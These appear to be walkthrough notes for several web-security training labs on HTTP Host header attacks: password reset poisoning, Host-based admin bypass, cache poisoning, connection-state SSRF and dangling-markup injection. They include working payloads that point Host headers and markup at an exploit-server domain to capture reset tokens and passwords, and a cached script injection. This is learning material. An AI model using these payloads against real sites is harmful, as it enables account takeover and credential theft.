# **Basic password reset poisoning Lab :**

 * **Lab Objective :** log in to Carlos's account

 * **Givens :**

     * lab is vulnerable to **password reset poisoning :**

         * Attacker manipulates the Host header in a request to redirect the password reset link to a malicious domain under their control

         * **Password Resetting Process :**

             1) User requests a password reset
             2) System generates a unique token.
             3) Token is sent to the user's email.
             4) User clicks the link containing the token.
             5) User sets a new password

     * **credentials:** wiener:peter

***

 * Go to ```My account``` Page and Use ```Forget password?``` Functionality, Then Enter Username ```Wiener``` and Click **Submit** 

 * Open The exploit Sever then Open ```Email client``` , Notice that you have Received an Email Containing the Following :

     * **Body :**
      
         * Which is a Link You Click to Reset the Password ```https://LabID.web-security-academy.net/forgot-password?temp-forgot-password-token=TOKEN```

             * There is a ```temp-forgot-password-token``` Token

         * Now Click This Link , Notice That You Have Been Redirected to Resetting Password Page 

 * Open Burp's HTTP History and Search For Forgetting Password Request Which is ```POST /forget-password``` and Send it To The Repeater  

 * The Request Contains The Following parameters :

     * **csrf=**TOKEN
     * **username=**wiener  

 * Change The ```Host Header``` to Any Value (X) and Send The Request : 

     * The Request is Sent Successfully 

 * Return Back To The Exploit Server And Check ```Email client``` , The Is a New Email Received Contains a Link ```https://X/forgot-password?temp-forgot-password-token=TOKEN```

 * So Let's Change the ```Host Header``` to Our Own Server Domain Name in This Case it is  Our Exploit Server's Domain Name and ```username``` Parameter to The Username Of Account We Want to Take Over **carlos** Then The Request :

     * The Request is Sent Successfully


 * Now Go Back To The Exploit Server and Open **access log** . You Will Find a Request ```GET /forget-password``` With ```temp-forgot-password-token``` Token 

 * Back To Email client and Copy the Original password reset Link from Your First Email , Change the Token to THe Token That You Got From Access log , Then Visit This Link :

     * Enter Any New password and Click **Submit** 

 * Now Log in To ```carlos``` Account With The New Password You Have Set                        



***
***
***

# **Host header authentication bypass Lab :**

 * **Lab Objective :** access the admin panel and delete the user carlos

 * **Givens :**  lab makes an assumption about the privilege level of the user based on the HTTP Host header

***

 * Open Burp's HTTP History and Search For  ```GET /``` and Send it To The Repeater :

     * Try To Change the **Host Header** Any Value (X) and Send The Request :

         * The Request is Sent Successfully 

 * Try To Access ```/robots.txt``` : 

     * ```User-agent: *```

     * ```Disallow: /admin``` 

 * Try To Access ```/admin``` :

     * ```Admin interface only available to local users```

         * Admin Panel Accessible for Local Users Only , So take ```GET /admin``` Request and Send it to The Repeater and Try To Change the ```Host Header``` To ```localhost``` :

             * The Admin Panel is Accessed Successfully 

                 * Now Delete User ```carlos``` By Changing Request to ```GET /admin/delete?username=carlos``` and Send This Request :

                     * User Deleted Successfully             

       
***
***
***

# **Web cache poisoning via ambiguous requests Lab :**

 * **Lab Objective :** poison the cache so the home page executes **alert(document.cookie)** in the victim's browser

 * **Givens :**  Lab is vulnerable to web cache poisoning due to discrepancies in how the cache and the back-end application handle ambiguous requests

***

 * Open Burp's HTTP History and Search For  ```GET /``` and Send it To The Repeater :

     * Try To Change the **Host Header** Any Value (X) and Send The Request :

         * ```403 Forbidden``` : The Website Validates the Host Header 

     * Return The Host Header to  its Original Value and Send The Request :

         * Look at The Response : There is a Header Called ```X-cache``` it Value is ``MISS``  :

             * This Header provides information about whether a response was served from a cache or directly from the origin server 

             * This Header Has Two Common Values : 

                 1) **HIT :**  The content was served from the CDN's cache
                 2) **MISS :** The content was not found in the cache and had to be fetched from the origin server    

         * Now Send The Request Multiple Times :

             * Notice That The Value of ```X-cache``` Header has Changed to ```HIT``` Which Means That The Content Is Cached 

     * Now Let's add Any Arbitrary Parameter to The request ```GET /?x=Hello```and Send The Request Multiple Time to Cache This Value    

     * What if We Add Another ``Host`` Header With Any Value ```Host: Hello.com``` and Send The Request Multiple Times :

         * The Second Host Header is Cached and Printed inside ```<script>``` Tag ```<script type="text/javascript" src="//Hello.com/resources/js/tracking.js"></script>```

     * Now Delete This Additional Host Header and Send The Request Multiple Time : 

         * The Second Host Header is Still Cached    

     * Now Go To The Exploit Server and Create a File Named ```/resources/js/tracking.js``` and set The ```Body``` Value to ```alert(document.cookie)``` Then Store Those Inputs

     * Back To Burp's Repeater to ```GET /``` Request and Change The Value of The Second Host Header to ```exploit-LAB-ID.exploit-server.net``` 


***
***
*** 
# **Host validation bypass via connection state attack Lab :** 

 * **Lab Objective :** access an internal admin panel located at ```192.168.0.1/admin```, then delete the user ```carlos```

 * **Givens :** 
 
     * lab is vulnerable to routing-based SSRF via the Host header

     * front-end server makes assumptions about all requests on a connection based on the first request it receives

***

 * Open Burp's HTTP History and Search For  ```GET /``` and Send it To The Repeater :

     * Try To Access the Admin Panel ```GET /admin``` Located at ```Host: 192.168.0.1``` :

         * ```301 Moved Permanently``` and You Will Be Redirected to Home Page


 * From **Givens** front-end server makes assumptions about all requests on a connection based on the first request it receives : 

     * So Open Another Tap Of The Original Request and Create a Group of Them Via ```create tap group``` in Burp :

         * Change ```Send``` to ```Send group in sequence(single connection)``` and Send The Request :

             * The First Request ```(GET / - Host: LAB_ID-web-security-academy.net)``` Will Be Redirected to Home Page , The Second Request ```(GET /admin - Host: 192.168.0.1)```  Will Access The Admin Panel


     * Now We Need to Modify The Second Request to Delete User ```carlos```, The Request Will Be  :

         * ```GET /admin/delete?username=carlos&csrf=TOKEN``` , The csrf Token You Will Find it Inside The Response of Second Request 

         * ```Host:192.168.0.1```


***
***
***

# **Password reset poisoning via dangling markup Lab :**

 * **Lab Objective :** log in to Carlos's account

 * **Givens :** 
 
     * lab is vulnerable to password reset poisoning via dangling markup

     * **credentials :** wiener:peter

***


 * Go to ```My account``` Page and Use ```Forget password?``` Functionality, Then Enter Username ```Wiener``` and Click **Submit** 
     

 * Open The exploit Sever then Open ```Email client``` , Notice that you have Received an Email Containing the New Password : 

     * Take This New Password and Go Back To The Login Page and Log in Using wiener:NEW-PASSWORD , Then Log Out Again     


 * Open Burp's HTTP History and Look For ```GET /email``` Request :

     * This Request Has The Following Script :

         ```js
         window.addEventListener('DOMContentLoaded', () => {
                 for (let el of document.getElementsByClassName('dirty-body')) {
                     el.innerHTML = DOMPurify.sanitize(el.getAttribute('data-dirty'));
                }
            });
         ```  

         * This Script Cleans potentially unsafe HTML content from elements with the class 'dirty-body' and safely inserts it into the DOM

         * **DOMPurify :** JavaScript library designed to sanitize HTML strings before inserting them into the DOM 


 * Now Back to ```Email client``` , There is a ```View raw``` Link Visit it , It Contains The Following : 

     ```
     <p>Hello!</p><p>Please <a href='https://LAB-ID.web-security-academy.net/login'>click here</a> to login with your new password: PASSWORD</p><p>Thanks,<br/>Support team</p><i>This email has been scanned by the MacCarthy Email Security service</i>
     ```  

 * Open Burp's HTTP History and Look For ```POST /forgot-password``` Request , and Send it to The Repeater : 

     * Change The Host Header to Any Random Value (RANDOM) and Send This Request :

         * ```504 Gateway Timeout```

     * Return The Original Host Header , But Change the Port Number to Any Value (X) ```LAB-ID.web-security-academy.net:X```and Send The Request : 

         * ```200 OK``` The Request is Sent Successfully

 * Back to ```Email client```, There is a New Email Received , Open it and Click ```View raw``` , It Contains :

     ```<p>Hello!</p><p>Please <a href='https://LAB-ID.web-security-academy.net:X/login'>click here</a> to login with your new password: T1h6igaN3K</p><p>Thanks,<br/>Support team</p><i>This email has been scanned by the MacCarthy Email Security service</i>   
     ```

     * The Random Port Printed HTML Tag 

     * Now Let's Change This Port to ```X'<a href="//exploit-0a64007e04fe10a98261147c019e00ef.exploit-server.net/?``` and Send The Request :

         * Back to ```Email client``` You Will Find a New Email With Less Info 


 * Now Back to Exploit Server and Open ```access log```, There is a GET Request That Contains a New Password :

     *  Back to ```POST /forgot-password``` and Change ```username``` parameter to **carlos**

     * Back to Exploit Server and Open ```access log```, There is a GET Request That Contains a New Password :

         * Take This Password and Back To Login Page And Log in Using Those Credentials carlos:NEWPASSWORD             

                   